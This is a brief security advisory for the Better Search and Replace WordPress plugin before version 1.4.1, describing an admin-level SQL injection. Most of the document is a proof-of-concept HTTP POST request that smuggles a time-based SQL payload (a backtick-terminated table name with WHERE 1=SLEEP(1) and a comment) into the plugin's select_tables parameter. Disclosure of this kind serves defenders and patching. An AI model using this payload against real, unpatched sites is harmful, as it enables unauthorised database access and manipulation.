Better Search and Replace < 1.4.1 - Admin+ SQLi

The plugin does not properly sanitise and escape table data before inserting it into a SQL query, which could allow high privilege users to perform SQL Injection attacks

PoC

POST /wp-admin/tools.php?page=better-search-replace&bsr-ajax;=process_search_replace HTTP/1.1 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 369 Connection: close Cookie:[admin+] bsr_ajax_nonce=3c38e50368&action;=process_search_replace&bsr;_step=0&bsr;_page=0&bsr;_data=search_for%3Daaa%26replace_with%3Dcef%26select_tables%255B%255D%3Dwp_posts%60%20WHERE%201=SLEEP(1)%20–%20%26dry_run%3Don%26bsr_nonce%3Da66e81c52b%26_wp_http_referer%3D%252Fwordpress%252Fwp-admin%252Ftools.php%253Fpage%253Dbetter-search-replace%26action%3Dbsr_process_search_replace